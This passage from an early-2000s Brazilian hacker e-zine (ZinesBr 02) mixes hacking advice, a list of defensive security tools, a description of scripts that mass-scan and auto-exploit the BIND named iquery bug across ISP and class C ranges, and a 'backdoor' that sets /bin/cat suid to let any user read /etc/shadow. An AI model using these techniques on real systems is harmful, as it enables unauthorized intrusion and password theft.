vulnerabilidades  encontradas  nos  produtos  (programas  em  geral). 
Dominar  um  so eh bom por  varios  coisas,  como: caso voce seja um 
administrador e domina seu so,o seu sistema estarah 98% protegido de
ataques de crackers; dominando um sistema,vc pode encontrar falhas e 
arruma-las imediamente; tb  dominando um so, qualquer coisa q surgir 
de estranho na sua makina voce sabera arrumar e entre outras milhoes
de vantagens q vc tem caso voce domina um sistema operacional.

---------------------------------------------------------------------

Claro que aprender tudo isso nao eh de um dia para o outro. Isso leva 
anos e anos.Nao queira ser apressado em aprender tudo isso rapido,pois 
voce pode ficar louco e o pior: sera 1 nerd (eu nao tenho nada contra 
nerds, tb nao tenho nada a favor, soh quero q os nerds nao se  sintam 
ofendidos)!Imagina vc todo santo dia 24:00hrs no computer...sem muieh,
sem amigos,... nossa!! Gosto nem de imaginar,portanto,aconselho a voce 
fucar com calma e depois de +/- uns 10 anos, oce serah um otimo expert 
em computadores..:)

Saiba que voce nao precisa aprender tudo o que foi dito para comecar a 
fucar! Voce pode comecar a fucar agora, porem,nao sei se voce vai obter 
exito no q pretende mas eh bom ir treinando desde jah de como fucar.E o 
mais importante: nunca desista! Sempre que tentar algo e nao conseguir, 
procure ajuda com alguem ...

______________________
Fucando em um programa
----------------------

Vou deixar mais claro ainda essa questao de fucar.Fucar eh voce usar 
um programa de diversas formas, tentar ataques como overflows, abrir 
seu codigo e vasculha lah dentro em busca de codigo que podem a  ser 
exploraveis, entre outras coisas. Faca de tudo com o programa!! Tudo 
que seja possivel voce deve fazer!!!

Sem mais.

                                                   Gotoxy
                                                   gotoxy@linuxbr.com.br
.:x| ------------------------------------------------------------------- |x:.










SETOR[07]
==[ Protegendo seu sistema - parte 2 ]==
==[ Por Gotoxy                       ]==


Bom, essa eh a segunda parte do texto de como se  proteger o seu 
sistema operacional contra ataques.Pois os administradores devem 
cuidar bastante do seu sistema, para q sempre tenha uma rede bem
seguranca contra invasoes.

.inDice
.i)   Protegendo seu sistema Linux 
.ii)  Programas uteis
.iii) Terminando


**********************************
.i)   Protegendo seu sistema Linux
**********************************

Mais uma vez venho eu a tentar dar um help aos administradores 
mais leigos na area de seguranca. 

Caso voce nao pegou a edicao 01 do zinesbr, recomendo ir pega-la 
neste momento, pois eh necessario voce ler o setor 'Protegendo seu 
sistema' para voce ter uma ideia de como proteger o seu sistema.
Caso jah tenha lido, continue lendo..

Nesta edicao de como se proteger o seu sistema, eu coloco os 
programas que sao de suma importancia e voce nao pode deixar de 
coloca-los em sua rede.

**********************
.ii)  Programas uteis
**********************

Abaixo segue alguns programas quesao necessarios para voce ter um
pouco de paz! Lembre-se: instale os programas abaixo mas nao se
esqueca q eles apenas vao ajudar na seguranca do seu sistema, mas
nao vou deixar sua rede ioo% segura contra ataques. O motivo
disso eh que a cada dia se descobre uma nova falha.Entao,procure 
sempre informacoes das ultimas falhas encontradas e como corrigi-las.
Uma maneira de se fazer isso eh assinando a BugTraq - 
www.securityfocus.com

- Os tres programas abaixo vem anexado junto ao zine:

=[ chkrootkit ]=
Ferramenta   para   identificar a   presena de  "rootkits"
ou "demonkits",que podem representar  o  comprometimento do 
sistema local.

=[ suidbofcheck.pl ]=
Esse  script  ira  procurar por  arquivos SUID no sistema e 
testar os tipos mais comuns  de  buffer overflow. Util para
auxiliar na descoberta de novos "furos".

=[ neped ]=
Com este programa, eh possivel voce descobrir se tem alguem 
monitorando voce. Sendo assim,se alguem de sua rede estiver 
utilizando um sniffer, voce sabera.

- Os programa listados abaixo nao vem anexado junto ao zine,
portanto,  para  pega-los  eh  necessario fazerem o download 
deles na Internet.

=[ portsentry ]= 
Esse eh  um  otimo programa  contra ataques  de  crackers.
Voce pode  encontra-lo em http://packetstorm.securify.com.
Ele eh bem mais eficiente do que as ferramentas conhecidas 
como IDS (intrusion detectoin system - sistema de deteccao 
de intrusos).

=[ vetescan ]=
Esse programa tb nao pode deixar de estar na sua makina. O 
que ele  faz eh  analizar o  seu  computador  em  busca de 
vulnerabilidades. Tudo  eh  gravado em um  arquivo de log, 
conforme voce verah quando estiver usando o programa. Voce 
pode encontra em: http://self-evident.com/

=[ nmap ]=
Este programa tb nao pode deixar de faltar.Ele eh um otimo
scan... procura por bugs em cgi,falhas no sistema,etc. Ele 
tb possui uma  tecnica conhecida  como fingerprint  que eh 
capaz de  obter a versao  do  sistema operacional  de  uma 
determinada     makina.    Voce   pode   encontra-lo   em:
www.insecure.org/nmap/.


*****************
.iii) Terminando
*****************

Como voces podem ver, nao falei muito. Nao eh preguica,
eh falta de tempo mesmo. Queiram-me desculpar, na
proxima edicao do zine vou fazer o maximo para sair
uma materia melhor sobre de como proteger seu sistema.


                                                   Gotoxy
                                                   gotoxy@linuxbr.com.br
.:x| ------------------------------------------------------------------- |x:.










SETOR[08]
==[ Named bug  ]==
==[ Por Gotoxy ]==

     Essa tecnica jah eh considerada velha, mas para os que
mataram a aula, vamos a explicao: esse bug (falha) do named
consiste na funcao req_iquery dele, q permite um segmentation
violation entao permitindo o ataque remoto...

     Para facilitar o nosso trabalho, vem anexado junto ao zine
o arquivo scang.tgz, vamos analizar:


check - Esse arquivo serve para checar uma makina para ver se
ela eh xploitavel, caso seja, ele xploita!
Uso: check host
Exemplo: check www.cade.com.br

check2 - Esse arquivo serve para pegar uma lista de provedores
do estado via CADE(TM) e entao tenta o 'check' em todos os
provedores.
Uso: check2 sigla_do_estado. 
Exemplo: check2 mg

check3 - Esse arquivo serve para checar toda uma class c 
(200.200.200.1 ate 200.200.200.255 por exemplo) em busca
de makinas com named bugado, caso encontre, ele xploita!
Uso: check3 ClassC

                                                   Gotoxy
                                                   gotoxy@linuxbr.com.br
.:x| ------------------------------------------------------------------- |x:.











SETOR[09]
==[ Backdoors  ]==
==[ Por Gotoxy ]==

Bom, nao vou repetir akeles backdoors que voces jah devem estar cansados 
de ler na maioria dos zines.Vou colocar algumas que provavelmente que vc
nao conhece abaixo, porem, nesta edicao vou publicar apenas uma:                 

--------------------
BACKDOOR DO /BIN/CAT 
--------------------

Bom, nao sei se isso consiste em uma backdoor, porem, sendo ou nao sendo 
uma especie de backdoor, quero q fiquem sabendo um outro metodo para se 
ver o arquivo /etc/shadow. 

Tente obter root no sistema ou entao convenca o admin a deixar o /bin/cat 
setado como suid (chmod +s /bin/cat).Sendo assim,eh possivel que qualquer
usuario veja sempre o arquivo /etc/shadow.


  + COMO USUARIO NORMAL NA SHELL 

[gotoxy@localhost]$ cat /etc/shadow
- Permisao Negada
[gotoxy@localhost]$

  + COMO ROOT NA SHELL

[root@localhost]# chmod +s /bin/cat
[root@localhost]#

  + COMO USUARIO NORMAL NA SHELL DENOVO

[gotoxy@localhost]$ cat /etc/shadow
gotoxy:AeIaiY2qoNngs:9818::::::
zinesbr:Ia3ge5NrA610br:9818::::::
...
   
No proximo zine, vamos aprender a utilizar a backdoor do PING, 
portanto, Aguarde!!:)

                                                   Gotoxy
                                                   gotoxy@linuxbr.com.br
.:x| ------------------------------------------------------------------- |x:.









SETOR [10]
==[ Ultimas palavras ]==
==[ Por Gotoxy       ]==

   O zine 02 era para ter saido no natal de 2000, mas como o nosso
AMIGO Kbytes sumiu durante dois meses, nao deu para publica-lo.
Daqui a pouco vamos lancar o zine03.. nao vai demorar muito para
publica-lo, portanto aguarde um pouco.

Ate a proxima Edicao !
________________________________________________________________________
________________________________________________________________________
------------------------------------ZinesBr-----------------------------

                          Perguntas? Duvidas? Sugestoes? 
                                zinesbr@ieg.com.br       
						      
                                   Home Page
                            http://zinesbr.hpg.com.br

  					      
                                6666666666666                    
          6666                66666666666666666            6666  
        6666666              6666666666666666666          6666666
        666666666           666666666666666666666       666666666
             66666666       666666666666666666666    6666666     
                666666      666     66666     666  66666         
                    666666  66   6   666   6   66 666            
                       6666 666     66666     666 6              
                          66 666666666 666666666 66              
           -[ ZinesBR ]-        6666     6666         -[ ZinesBR ]-                    
                              66 66666666666 66                  
          66666         666666 66           66 666666         666
          666666    66666666   666         666   66666666    6666
           6666666666666        66666   66666        66666666666 
             66666666            66666666666            6666666  
            666666                 6666666                666666 
             6666                                          6666  